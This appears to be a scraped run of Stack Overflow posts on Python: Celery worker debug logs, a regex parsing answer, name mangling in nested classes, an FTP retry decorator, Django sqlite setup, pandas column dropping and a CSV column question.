[2016-09-27 20:43:15,420: DEBUG/MainProcess] Start from server, version: 0.9, properties: {'capabilities': {'per_consumer_qos': True, 'direct_reply_to': True, 'basic.nack': True, 'consumer_priorities': True, 'publisher_confirms': True, 'authentication_failure_close': True, 'connection.blocked': True, 'consumer_cancel_notify': True, 'exchange_exchange_bindings': True}, 'information': 'Licensed under the MPL. See http://www.rabbitmq.com/', 'version': '3.6.5', 'product': 'RabbitMQ', 'cluster_name': 'rabbit@d78e61a6690d', 'copyright': 'Copyright (C) 2007-2016 Pivotal Software, Inc.', 'platform': 'Erlang/OTP'}, mechanisms: ['PLAIN', 'AMQPLAIN'], locales: ['en_US']
[2016-09-27 20:43:15,422: DEBUG/MainProcess] Open OK!
[2016-09-27 20:43:15,422: INFO/MainProcess] Connected to amqp://guest:**@127.0.0.1:5672//
[2016-09-27 20:43:15,422: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:15,422: DEBUG/MainProcess] | Consumer: Starting Events
[2016-09-27 20:43:15,429: DEBUG/MainProcess] Start from server, version: 0.9, properties: {'capabilities': {'per_consumer_qos': True, 'direct_reply_to': True, 'basic.nack': True, 'consumer_priorities': True, 'publisher_confirms': True, 'authentication_failure_close': True, 'connection.blocked': True, 'consumer_cancel_notify': True, 'exchange_exchange_bindings': True}, 'information': 'Licensed under the MPL. See http://www.rabbitmq.com/', 'version': '3.6.5', 'product': 'RabbitMQ', 'cluster_name': 'rabbit@d78e61a6690d', 'copyright': 'Copyright (C) 2007-2016 Pivotal Software, Inc.', 'platform': 'Erlang/OTP'}, mechanisms: ['PLAIN', 'AMQPLAIN'], locales: ['en_US']
[2016-09-27 20:43:15,430: DEBUG/MainProcess] Open OK!
[2016-09-27 20:43:15,431: DEBUG/MainProcess] using channel_id: 1
[2016-09-27 20:43:15,433: DEBUG/MainProcess] Channel open
[2016-09-27 20:43:15,433: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:15,433: DEBUG/MainProcess] | Consumer: Starting Mingle
[2016-09-27 20:43:15,434: INFO/MainProcess] mingle: searching for neighbors
[2016-09-27 20:43:15,434: DEBUG/MainProcess] using channel_id: 1
[2016-09-27 20:43:15,435: DEBUG/MainProcess] Channel open
[2016-09-27 20:43:16,445: INFO/MainProcess] mingle: all alone
[2016-09-27 20:43:16,445: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:16,445: DEBUG/MainProcess] | Consumer: Starting Tasks
[2016-09-27 20:43:16,451: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:16,451: DEBUG/MainProcess] | Consumer: Starting Control
[2016-09-27 20:43:16,451: DEBUG/MainProcess] using channel_id: 2
[2016-09-27 20:43:16,452: DEBUG/MainProcess] Channel open
[2016-09-27 20:43:16,455: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:16,456: DEBUG/MainProcess] | Consumer: Starting Gossip
[2016-09-27 20:43:16,456: DEBUG/MainProcess] using channel_id: 3
[2016-09-27 20:43:16,456: DEBUG/MainProcess] Channel open
[2016-09-27 20:43:16,467: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:16,467: DEBUG/MainProcess] | Consumer: Starting Heart
[2016-09-27 20:43:16,468: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:16,469: DEBUG/MainProcess] | Consumer: Starting event loop
[2016-09-27 20:43:16,470: WARNING/MainProcess] celery@Slug.local ready.
[2016-09-27 20:43:16,470: DEBUG/MainProcess] | Worker: Hub.register Autoreloader...
^C
worker: Hitting Ctrl+C again will terminate all running tasks!
worker: Warm shutdown (MainProcess)
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Worker: Closing Hub...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Worker: Closing Pool...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Worker: Closing Autoreloader...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Worker: Closing Consumer...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Worker: Stopping Consumer...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Consumer: Closing Connection...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Consumer: Closing Events...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Consumer: Closing Mingle...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Consumer: Closing Tasks...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Consumer: Closing Control...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Consumer: Closing Gossip...
[2016-09-27 20:44:33,369: DEBUG/MainProcess] | Consumer: Closing Heart...
[2016-09-27 20:44:33,369: DEBUG/MainProcess] | Consumer: Closing event loop...
[2016-09-27 20:44:33,369: DEBUG/MainProcess] | Consumer: Stopping event loop...
[2016-09-27 20:44:33,369: DEBUG/MainProcess] | Consumer: Stopping Heart...
[2016-09-27 20:44:33,369: DEBUG/MainProcess] | Consumer: Stopping Gossip...
[2016-09-27 20:44:33,372: DEBUG/MainProcess] Closed channel #3
[2016-09-27 20:44:33,373: DEBUG/MainProcess] | Consumer: Stopping Control...
[2016-09-27 20:44:33,374: DEBUG/MainProcess] Closed channel #2
[2016-09-27 20:44:33,374: DEBUG/MainProcess] | Consumer: Stopping Tasks...
[2016-09-27 20:44:33,374: DEBUG/MainProcess] Canceling task consumer...
[2016-09-27 20:44:33,375: DEBUG/MainProcess] | Consumer: Stopping Mingle...
[2016-09-27 20:44:33,375: DEBUG/MainProcess] | Consumer: Stopping Events...
[2016-09-27 20:44:33,375: DEBUG/MainProcess] | Consumer: Stopping Connection...
[2016-09-27 20:44:33,375: DEBUG/MainProcess] | Worker: Stopping Autoreloader...
[2016-09-27 20:44:33,375: DEBUG/MainProcess] | Worker: Stopping Pool...
[2016-09-27 20:44:34,388: DEBUG/MainProcess] | Worker: Stopping Hub...
[2016-09-27 20:44:34,388: DEBUG/MainProcess] | Consumer: Shutdown Heart...
[2016-09-27 20:44:34,389: DEBUG/MainProcess] | Consumer: Shutdown Gossip...
[2016-09-27 20:44:34,389: DEBUG/MainProcess] | Consumer: Shutdown Control...
[2016-09-27 20:44:34,389: DEBUG/MainProcess] | Consumer: Shutdown Tasks...
[2016-09-27 20:44:34,389: DEBUG/MainProcess] Canceling task consumer...
[2016-09-27 20:44:34,389: DEBUG/MainProcess] Closing consumer channel...
[2016-09-27 20:44:34,389: DEBUG/MainProcess] | Consumer: Shutdown Events...
[2016-09-27 20:44:34,390: DEBUG/MainProcess] Closed channel #1
[2016-09-27 20:44:34,391: DEBUG/MainProcess] | Consumer: Shutdown Connection...
[2016-09-27 20:44:34,392: DEBUG/MainProcess] Closed channel #1
[2016-09-27 20:44:34,396: DEBUG/MainProcess] removing tasks from inqueue until task handler finished
</code></pre>
<p>Without <code>--autoreload</code> (note "redelivered" status of the first two tasks);</p>
<pre><code>$ celery -A ego worker -l debug
[2016-09-27 20:44:42,075: DEBUG/MainProcess] | Worker: Preparing bootsteps.
[2016-09-27 20:44:42,079: DEBUG/MainProcess] | Worker: Building graph...
[2016-09-27 20:44:42,080: DEBUG/MainProcess] | Worker: New boot order: {Timer, Hub, Queues (intra), Pool, Autoscaler, Autoreloader, Beat, StateDB, Consumer}
[2016-09-27 20:44:42,087: DEBUG/MainProcess] | Consumer: Preparing bootsteps.
[2016-09-27 20:44:42,088: DEBUG/MainProcess] | Consumer: Building graph...
[2016-09-27 20:44:42,101: DEBUG/MainProcess] | Consumer: New boot order: {Connection, Agent, Events, Mingle, Gossip, Heart, Tasks, Control, event loop}
-------------- celery@Slug.local v3.1.23 (Cipater)
---- **** -----
--- * *** * -- Darwin-16.0.0-x86_64-i386-64bit
-- * - **** ---
- ** ---------- [config]
- ** ---------- .> app: ego:0x10516f710
- ** ---------- .> transport: amqp://guest:**@localhost:5672//
- ** ---------- .> results: disabled://
- *** --- * --- .> concurrency: 8 (prefork)
-- ******* ----
--- ***** ----- [queues]
-------------- .> celery exchange=celery(direct) key=celery
[tasks]
. celery.backend_cleanup
. celery.chain
. celery.chord
. celery.chord_unlock
. celery.chunks
. celery.group
. celery.map
. celery.starmap
. ego.celery.account_alerts
. ledger.tasks.AccountAlerts
[2016-09-27 20:44:42,105: DEBUG/MainProcess] | Worker: Starting Hub
[2016-09-27 20:44:42,105: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:42,105: DEBUG/MainProcess] | Worker: Starting Pool
[2016-09-27 20:44:42,387: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:42,387: DEBUG/MainProcess] | Worker: Starting Consumer
[2016-09-27 20:44:42,388: DEBUG/MainProcess] | Consumer: Starting Connection
[2016-09-27 20:44:42,398: DEBUG/MainProcess] Start from server, version: 0.9, properties: {'copyright': 'Copyright (C) 2007-2016 Pivotal Software, Inc.', 'capabilities': {'publisher_confirms': True, 'authentication_failure_close': True, 'exchange_exchange_bindings': True, 'consumer_priorities': True, 'per_consumer_qos': True, 'consumer_cancel_notify': True, 'direct_reply_to': True, 'basic.nack': True, 'connection.blocked': True}, 'information': 'Licensed under the MPL. See http://www.rabbitmq.com/', 'platform': 'Erlang/OTP', 'cluster_name': 'rabbit@d78e61a6690d', 'product': 'RabbitMQ', 'version': '3.6.5'}, mechanisms: ['PLAIN', 'AMQPLAIN'], locales: ['en_US']
[2016-09-27 20:44:42,399: DEBUG/MainProcess] Open OK!
[2016-09-27 20:44:42,399: INFO/MainProcess] Connected to amqp://guest:**@127.0.0.1:5672//
[2016-09-27 20:44:42,400: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:42,400: DEBUG/MainProcess] | Consumer: Starting Events
[2016-09-27 20:44:42,408: DEBUG/MainProcess] Start from server, version: 0.9, properties: {'copyright': 'Copyright (C) 2007-2016 Pivotal Software, Inc.', 'capabilities': {'publisher_confirms': True, 'authentication_failure_close': True, 'exchange_exchange_bindings': True, 'consumer_priorities': True, 'per_consumer_qos': True, 'consumer_cancel_notify': True, 'direct_reply_to': True, 'basic.nack': True, 'connection.blocked': True}, 'information': 'Licensed under the MPL. See http://www.rabbitmq.com/', 'platform': 'Erlang/OTP', 'cluster_name': 'rabbit@d78e61a6690d', 'product': 'RabbitMQ', 'version': '3.6.5'}, mechanisms: ['PLAIN', 'AMQPLAIN'], locales: ['en_US']
[2016-09-27 20:44:42,409: DEBUG/MainProcess] Open OK!
[2016-09-27 20:44:42,409: DEBUG/MainProcess] using channel_id: 1
[2016-09-27 20:44:42,412: DEBUG/MainProcess] Channel open
[2016-09-27 20:44:42,412: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:42,412: DEBUG/MainProcess] | Consumer: Starting Mingle
[2016-09-27 20:44:42,412: INFO/MainProcess] mingle: searching for neighbors
[2016-09-27 20:44:42,413: DEBUG/MainProcess] using channel_id: 1
[2016-09-27 20:44:42,426: DEBUG/MainProcess] Channel open
[2016-09-27 20:44:43,445: INFO/MainProcess] mingle: all alone
[2016-09-27 20:44:43,445: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:43,445: DEBUG/MainProcess] | Consumer: Starting Gossip
[2016-09-27 20:44:43,445: DEBUG/MainProcess] using channel_id: 2
[2016-09-27 20:44:43,446: DEBUG/MainProcess] Channel open
[2016-09-27 20:44:43,450: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:43,450: DEBUG/MainProcess] | Consumer: Starting Heart
[2016-09-27 20:44:43,451: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:43,451: DEBUG/MainProcess] | Consumer: Starting Tasks
[2016-09-27 20:44:43,456: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:43,456: DEBUG/MainProcess] | Consumer: Starting Control
[2016-09-27 20:44:43,456: DEBUG/MainProcess] using channel_id: 3
[2016-09-27 20:44:43,457: DEBUG/MainProcess] Channel open
[2016-09-27 20:44:43,460: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:43,460: DEBUG/MainProcess] | Consumer: Starting event loop
[2016-09-27 20:44:43,461: WARNING/MainProcess] celery@Slug.local ready.
[2016-09-27 20:44:43,462: DEBUG/MainProcess] | Worker: Hub.register Pool...
[2016-09-27 20:44:43,462: DEBUG/MainProcess] basic.qos: prefetch_count->32
[2016-09-27 20:44:43,463: INFO/MainProcess] Received task: ego.celery.account_alerts[bc4c5b05-6306-4a57-b1a0-eca1e9282c13]
[2016-09-27 20:44:43,463: DEBUG/MainProcess] TaskPool: Apply <function _fast_trace_task at 0x105263950> (args:('ego.celery.account_alerts', 'bc4c5b05-6306-4a57-b1a0-eca1e9282c13', [], {}, {'is_eager': False, 'delivery_info': {'exchange': 'celery', 'routing_key': 'celery', 'redelivered': True, 'priority': 0}, 'correlation_id': 'bc4c5b05-6306-4a57-b1a0-eca1e9282c13', 'expires': None, 'chord': None, 'task': 'ego.celery.account_alerts', 'timelimit': [None, None], 'callbacks': None, 'headers': {}, 'utc': True, 'errbacks': None, 'eta': None, 'kwargs': {}, 'args': [], 'hostname': 'celery@Slug.local', 'taskset': None, 'group': None, 'retries': 0, 'id': 'bc4c5b05-6306-4a57-b1a0-eca1e9282c13', 'reply_to': '656c174e-c251-3e02-8132-df741c11a046'}) kwargs:{})
[2016-09-27 20:44:43,465: DEBUG/MainProcess] Task accepted: ego.celery.account_alerts[bc4c5b05-6306-4a57-b1a0-eca1e9282c13] pid:63322
[2016-09-27 20:44:43,478: INFO/MainProcess] Task ego.celery.account_alerts[bc4c5b05-6306-4a57-b1a0-eca1e9282c13] succeeded in 0.013773033046163619s: 'nothing here, yet'
[2016-09-27 20:44:45,458: INFO/MainProcess] Received task: ego.celery.account_alerts[b7673a47-dd76-4f1d-b414-03744fcfac22]
[2016-09-27 20:44:45,459: DEBUG/MainProcess] TaskPool: Apply <function _fast_trace_task at 0x105263950> (args:('ego.celery.account_alerts', 'b7673a47-dd76-4f1d-b414-03744fcfac22', [], {}, {'is_eager': False, 'delivery_info': {'exchange': 'celery', 'routing_key': 'celery', 'redelivered': True, 'priority': 0}, 'correlation_id': 'b7673a47-dd76-4f1d-b414-03744fcfac22', 'expires': None, 'chord': None, 'task': 'ego.celery.account_alerts', 'timelimit': [None, None], 'callbacks': None, 'headers': {}, 'utc': True, 'errbacks': None, 'eta': None, 'kwargs': {}, 'args': [], 'hostname': 'celery@Slug.local', 'taskset': None, 'group': None, 'retries': 0, 'id': 'b7673a47-dd76-4f1d-b414-03744fcfac22', 'reply_to': '656c174e-c251-3e02-8132-df741c11a046'}) kwargs:{})
[2016-09-27 20:44:45,461: DEBUG/MainProcess] Task accepted: ego.celery.account_alerts[b7673a47-dd76-4f1d-b414-03744fcfac22] pid:63327
[2016-09-27 20:44:45,462: INFO/MainProcess] Task ego.celery.account_alerts[b7673a47-dd76-4f1d-b414-03744fcfac22] succeeded in 0.0010689240298233926s: 'nothing here, yet'
[2016-09-27 20:45:00,002: INFO/MainProcess] Received task: ego.celery.account_alerts[2d464f3a-36f3-4f45-b303-aa477bc30545]
[2016-09-27 20:45:00,002: DEBUG/MainProcess] TaskPool: Apply <function _fast_trace_task at 0x105263950> (args:('ego.celery.account_alerts', '2d464f3a-36f3-4f45-b303-aa477bc30545', [], {}, {'is_eager': False, 'delivery_info': {'exchange': 'celery', 'routing_key': 'celery', 'redelivered': False, 'priority': 0}, 'correlation_id': '2d464f3a-36f3-4f45-b303-aa477bc30545', 'expires': None, 'chord': None, 'task': 'ego.celery.account_alerts', 'timelimit': [None, None], 'callbacks': None, 'headers': {}, 'utc': True, 'errbacks': None, 'eta': None, 'kwargs': {}, 'args': [], 'hostname': 'celery@Slug.local', 'taskset': None, 'group': None, 'retries': 0, 'id': '2d464f3a-36f3-4f45-b303-aa477bc30545', 'reply_to': '656c174e-c251-3e02-8132-df741c11a046'}) kwargs:{})
[2016-09-27 20:45:00,003: DEBUG/MainProcess] Task accepted: ego.celery.account_alerts[2d464f3a-36f3-4f45-b303-aa477bc30545] pid:63321
[2016-09-27 20:45:00,003: INFO/MainProcess] Task ego.celery.account_alerts[2d464f3a-36f3-4f45-b303-aa477bc30545] succeeded in 0.000625498010776937s: 'nothing here, yet'
[2016-09-27 20:46:00,002: INFO/MainProcess] Received task: ego.celery.account_alerts[f8eba8f2-1c48-48bd-a221-2676c735299e]
[2016-09-27 20:46:00,003: DEBUG/MainProcess] TaskPool: Apply <function _fast_trace_task at 0x105263950> (args:('ego.celery.account_alerts', 'f8eba8f2-1c48-48bd-a221-2676c735299e', [], {}, {'is_eager': False, 'delivery_info': {'exchange': 'celery', 'routing_key': 'celery', 'redelivered': False, 'priority': 0}, 'correlation_id': 'f8eba8f2-1c48-48bd-a221-2676c735299e', 'expires': None, 'chord': None, 'task': 'ego.celery.account_alerts', 'timelimit': [None, None], 'callbacks': None, 'headers': {}, 'utc': True, 'errbacks': None, 'eta': None, 'kwargs': {}, 'args': [], 'hostname': 'celery@Slug.local', 'taskset': None, 'group': None, 'retries': 0, 'id': 'f8eba8f2-1c48-48bd-a221-2676c735299e', 'reply_to': '656c174e-c251-3e02-8132-df741c11a046'}) kwargs:{})
[2016-09-27 20:46:00,004: DEBUG/MainProcess] Task accepted: ego.celery.account_alerts[f8eba8f2-1c48-48bd-a221-2676c735299e] pid:63325
[2016-09-27 20:46:00,005: INFO/MainProcess] Task ego.celery.account_alerts[f8eba8f2-1c48-48bd-a221-2676c735299e] succeeded in 0.0016709549818187952s: 'nothing here, yet'
</code></pre>
| 0 | 2016-09-27T20:49:38Z | [
"python",
"django",
"celery"
]
|
Python parse string into Python dictionary of list | 39,732,970 | <p>There are two parts to this question:</p>
<p><strong>I. I'd like to parse Python string into a list of dictionary.</strong> </p>
<p>****Here is the Python String****</p>
<pre><code>../Data.py:92 final computing result as shown below: [historic_list {id: 'A(long) 11A' startdate: 42521 numvaluelist: 0.1065599566767107 datelist: 42521}historic_list {id: 'A(short) 11B' startdate: 42521 numvaluelist: 0.0038113334533441123 datelist: 42521 }historic_list {id: 'B(long) 11C' startdate: 42521 numvaluelist: 20.061623176440904 datelist: 42521}time_statistics {job_id: '' portfolio_id: '112341'} UrlPairList {}]
</code></pre>
<p>****Expected Python Output:****</p>
<pre><code>{
"data" :[
{
"id": "A(long) 11A"
"startdate": "42521"
"numvaluelist": "0.1065599566767107"
},
{
"id": "A(short) 11B"
"startdate": "42521"
"numvaluelist": "0.0038113334533441123"
},
{
"id": "B(long) 11C"
"startdate": "42521"
"numvaluelist": "20.061623176440904"
}
]
}
</code></pre>
<p><strong>II. I need to further parse key values of id and numvaluelist. I am not sure if there is a better way to do it. Hence, I am converting string to Python Dictionary, loop through that and parse further. Please guide me if I am overthinking the solution.</strong></p>
<p><strong>Update: Code</strong></p>
<pre><code>text = "[historic_list {id: 'A(long) 11A' startdate: 42521 numvaluelist: 0.1065599566767107 datelist: 42521}historic_list {id: 'A(short) 11B' startdate: 42521 numvaluelist: 0.0038113334533441123 datelist: 42521 }historic_list {id: 'B(long) 11C' startdate: 42521 numvaluelist: 20.061623176440904 datelist: 42521}time_statistics {job_id: '' portfolio_id: '112341'} UrlPairList {}]"
data = text.strip("../Data.py:92 final computing result as shown below: ")
print data
</code></pre>
| 0 | 2016-09-27T19:37:24Z | 39,735,003 | <p>Your input raw text looks pretty predictable, try this:</p>
<pre><code>>>> import re
>>> raw = "[historic_list {id: 'A(long) 11A' startdate: 42521 numvaluelist: 0.1065599566767107 datelist: 42521}historic_list {id: 'A(short) 11B' startdate: 42521 numvaluelist: 0.0038113334533441123 datelist: 42521 }historic_list {id: 'B(long) 11C' startdate: 42521 numvaluelist: 20.061623176440904 datelist: 42521}time_statistics {job_id: '' portfolio_id: '112341'} UrlPairList {}]"
>>> line_re = re.compile(r'\{[^\}]+\}')
>>> records = line_re.findall(raw)
>>> record_re = re.compile(
... r"""
... id:\s*\'(?P<id>[^']+)\'\s*
... startdate:\s*(?P<startdate>\d+)\s*
... numvaluelist:\s*(?P<numvaluelist>[\d\.]+)\s*
... datelist:\s*(?P<datelist>\d+)\s*
... """,
... re.X
... )
>>> record_parsed = record_re.search(line_re.findall(raw)[0])
>>> record_parsed.groupdict()
{'startdate': '42521', 'numvaluelist': '0.1065599566767107', 'datelist': '42521', 'id': 'A(long) 11A'}
>>> for record in records:
... record_parsed = record_re.search(record)
... # Here is where you would do whatever you need with the fields.
</code></pre>
<p>To parse the subelements of the id, e.g.:</p>
<pre><code>>>> record_re2 = re.compile(
... r"""
... id:\s*\'
... (?P<id_letter>[A-Z]+)
... \(
... (?P<id_type>[^\)]+)
... \)\s*
... (?P<id_codenum>\d+)
... (?P<id_codeletter>[A-Z]+)
... \'\s*
... startdate:\s*(?P<startdate>\d+)\s*
... numvaluelist:\s*(?P<numvaluelist>[\d\.]+)\s*
... datelist:\s*(?P<datelist>\d+)\s*
... """,
... re.X
... )
>>> record2_parsed = record_re2.search(line_re.findall(raw)[0])
>>> record2_parsed.groupdict()
{'startdate': '42521', 'numvaluelist': '0.1065599566767107', 'id_letter': 'A', 'id_codeletter': 'A', 'datelist': '42521', 'id_type': 'long', 'id_codenum': '11'}
</code></pre>
| 1 | 2016-09-27T21:59:57Z | [
"python",
"list",
"loops",
"dictionary"
]
|
python - nested class access modifier | 39,732,985 | <p>I'm trying to make an instance of a <code>__Profile</code> class in the constructor of the <code>__Team</code> class, but I can't get access to <code>__Profile</code>. How should I do it?</p>
<p>This is my code</p>
<pre><code>class SlackApi:
# my work
class __Team:
class __Profile:
def get(self):
# my work
def __init__(self, slackApi):
self.slackApi = slackApi
self.profile = __Profile()
self.profile = __Team.__Profile()
self.profile = SlackApi.__Team.__Profile()
# I tried to all of these case, but I failed
# I need to keep '__Team', '__Profile' class as private class
</code></pre>
<p>My python version is 3.5.1</p>
| 0 | 2016-09-27T19:38:24Z | 39,733,109 | <p>You MAY access like so:</p>
<pre><code>SlackApi._SlackApi__Team._Team__Profile
</code></pre>
<p>or like so:</p>
<pre><code>self._Team__Profile
</code></pre>
<p>But that's just wrong. For your own convenience, don't make them a private class.</p>
| 0 | 2016-09-27T19:47:14Z | [
"python",
"nested",
"private",
"python-3.5"
]
|
python - nested class access modifier | 39,732,985 | <p>I'm trying to make an instance of a <code>__Profile</code> class in the constructor of the <code>__Team</code> class, but I can't get access to <code>__Profile</code>. How should I do it?</p>
<p>This is my code</p>
<pre><code>class SlackApi:
# my work
class __Team:
class __Profile:
def get(self):
# my work
def __init__(self, slackApi):
self.slackApi = slackApi
self.profile = __Profile()
self.profile = __Team.__Profile()
self.profile = SlackApi.__Team.__Profile()
# I tried to all of these case, but I failed
# I need to keep '__Team', '__Profile' class as private class
</code></pre>
<p>My python version is 3.5.1</p>
| 0 | 2016-09-27T19:38:24Z | 39,733,134 | <p>Python does not have access modifiers. If you try to treat <code>__</code> like a traditional <code>private</code> access modifier, this is one of the problems you get. Leading double underscores cause name mangling - a name <code>__bar</code> inside a <code>class Foo</code> (or <code>class __Foo</code>, or any number of leading underscores before <code>Foo</code>) will be mangled to <code>_Foo__bar</code>.</p>
<p>If you really want to keep those leading double underscores, you'll have to explicitly mangle the names yourself:</p>
<pre><code>self.profile = SlackApi._SlackApi__Team._Team__Profile()
</code></pre>
<p>This is also how you would access the <code>__Profile</code> class from outside of <code>SlackApi</code> altogether, so you're basically bypassing any pretense that these things are private.</p>
| 1 | 2016-09-27T19:48:36Z | [
"python",
"nested",
"private",
"python-3.5"
]
|
setup a database in django | 39,733,082 | <p>I followed the django doc and went through the polls example. I have a sqlite db 'nameinfodb'. I want to access it by search last name online.
I setup models.py as </p>
<pre><code>class Infotable(models.Model):
pid_text = models.CharField(max_length=200)
lname_text = models.CharField(max_length=200)
fname_text = models.CharField(max_length=200)
affs_text = models.CharField(max_length=2000)
idlist_text = models.CharField(max_length=2000)
def __str__(self):
return self
</code></pre>
<p>I copied name.info.db to where db.sqlite3 locates, changed settings.py:</p>
<pre><code>DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'name.info.db'),
}
}
</code></pre>
<p>Then I run </p>
<pre><code>python manage.py migrate
python manage.py makemigrations pidb
</code></pre>
<p>Then I checked if I did correctly</p>
<pre><code>$ python manage.py sqlmigrate pidb 0001
BEGIN;
--
-- Create model Choice
--
CREATE TABLE "pidb_choice" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "choice_text" varchar(200) NOT NULL, "votes" integer NOT NULL);
--
-- Create model Question
--
CREATE TABLE "pidb_question" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "question_text" varchar(200) NOT NULL, "pub_date" datetime NOT NULL);
--
-- Add field question to choice
--
ALTER TABLE "pidb_choice" RENAME TO "pidb_choice__old";
CREATE TABLE "pidb_choice" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "choice_text" varchar(200) NOT NULL, "votes" integer NOT NULL, "question_id" integer NOT NULL REFERENCES "pidb_question" ("id"));
INSERT INTO "pidb_choice" ("id", "question_id", "choice_text", "votes") SELECT "id", NULL, "choice_text", "votes" FROM "pidb_choice__old";
DROP TABLE "pidb_choice__old";
CREATE INDEX "pidb_choice_7aa0f6ee" ON "pidb_choice" ("question_id");
COMMIT;
</code></pre>
<p>I didn't see any information about the new database, all I see is the example polls data. Did I do anything wrong here? All I need to do is connect to name.info.db, and access it by last name. Thanks!</p>
| 1 | 2016-09-27T19:45:33Z | 39,733,136 | <p>You need to do it the other way around:</p>
<pre><code>python manage.py makemigrations pidb
python manage.py migrate
</code></pre>
<p><a href="https://docs.djangoproject.com/en/1.10/intro/tutorial02/#activating-models" rel="nofollow">See this part</a> of the tutorial for more information</p>
| 3 | 2016-09-27T19:48:38Z | [
"python",
"django",
"database"
]
|
While loop decorator | 39,733,131 | <p>I am using the <code>ftp</code> library which is incredibly finicky when downloading a bunch of files. This will error about once every 20 tries:</p>
<pre><code>ftp.cwd(locale_dir)
</code></pre>
<p>So, what I do which fixes it is:</p>
<pre><code>while True:
try:
ftp.cwd(locale_dir)
except:
continue
break
</code></pre>
<p>How would I write a python decorator to do this, as I have to do the above on about 10 ftp commands in a script. It would be nice if I could have something like:</p>
<pre><code>retry_on_failure(ftp.cwd(locale_dir))
</code></pre>
| 1 | 2016-09-27T19:48:30Z | 39,733,234 | <p>You may create decorator as:</p>
<pre><code>def retry_on_failure(count=10): # <- default count as 10
def retry_function(function):
def wrapper(*args, **kwargs):
while count > 0:
try:
func_response = function(view, request, *args, **kwargs)
break # <- breaks the while loop if success
except:
count -= 1
func_response = None
return func_response
return wrapper
return retry_function
</code></pre>
<p>Now create your file download function with this decorator as:</p>
<pre><code>@retry_on_failure(count=20) # <- will make attempts upto 20 times if unable to downlaod
def download_file(file_name):
ftp.cwd(file_namee)
</code></pre>
<p>You may use this decorator with any function, where you need to make a retry attempt in case of any exception (not just your file download function). This is the beauty of <code>decorators</code>, these are generic adoptable by any function ;)</p>
<p>In order to make a call to <code>download_file</code> fuction, just do: </p>
<pre><code>download_file(file_name)
</code></pre>
| 2 | 2016-09-27T19:55:01Z | [
"python"
]
|
While loop decorator | 39,733,131 | <p>I am using the <code>ftp</code> library which is incredibly finicky when downloading a bunch of files. This will error about once every 20 tries:</p>
<pre><code>ftp.cwd(locale_dir)
</code></pre>
<p>So, what I do which fixes it is:</p>
<pre><code>while True:
try:
ftp.cwd(locale_dir)
except:
continue
break
</code></pre>
<p>How would I write a python decorator to do this, as I have to do the above on about 10 ftp commands in a script. It would be nice if I could have something like:</p>
<pre><code>retry_on_failure(ftp.cwd(locale_dir))
</code></pre>
| 1 | 2016-09-27T19:48:30Z | 39,733,451 | <p>You can't use the syntax you want, because in that code <code>ftp.cwd(locale_dir)</code> gets called before <code>retry_on_failure</code>, so any exception it raises will prevent the <code>retry</code> function from running. You could separate the function and its arguments, however, and call something like <code>retry_on_failure(ftp.cwd, (locale_dir,))</code>.</p>
<p>Here's an implementation that would work with that syntax. (Note, this isn't a decorator, as that's usually meant in Python.)</p>
<pre><code>def retry_on_failure(func, args=(), kwargs={}):
while True:
try:
return func(*args, **kwargs)
except Exception:
pass
</code></pre>
<p>This will of course run forever if the function <em>always</em> raises an exception, so use with care. You could add a limit to the number of repetitions or add logging if you wanted to.</p>
| 1 | 2016-09-27T20:09:25Z | [
"python"
]
|
How to drop columns with empty headers in Pandas? | 39,733,141 | <p>If I have a DF: </p>
<pre><code>Name1 Name2 NUll Name3 NULL Name4
abc abc null abc
abc abc null abc
abc abc null abc
abc abc null abc
</code></pre>
<p>Can I use dropna, to keep Name3 as a column with all empty values? Yet still drop both Null columns.
Thank you</p>
| -1 | 2016-09-27T19:48:48Z | 39,733,278 | <p>What about using <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.drop.html" rel="nofollow"><code>DataFrame.drop</code></a>?</p>
<pre><code>In [3]: df = pd.read_clipboard()
Out[3]:
Name1 Name2 NUll Name3 NULL Name4
0 abc abc null abc
1 abc abc null abc
2 abc abc null abc
3 abc abc null abc
In [4]: df.drop(["NUll", "NULL"], axis=1)
Out[4]:
Name1 Name2 Name3 Name4
0 abc abc null abc
1 abc abc null abc
2 abc abc null abc
3 abc abc null abc
</code></pre>
| 0 | 2016-09-27T19:58:08Z | [
"python",
"pandas"
]
|
Add a new column to a csv file in python | 39,733,158 | <p>I am trying to add a column to a csv file that combines strings from two other columns. Whenever I try this I either get an output csv with only the new column or an output with all of the original data and not the new column. </p>
<p>This is what I have so far:</p>
<pre><code>with open(filename) as csvin:
readfile = csv.reader(csvin, delimiter=',')
with open(output, 'w') as csvout:
writefile = csv.writer(csvout, delimiter=',', lineterminator='\n')
for row in readfile:
result = [str(row[10]) + ' ' + str(row[11])]
writefile.writerow(result)
</code></pre>
<p>Any help would be appreciated.</p>
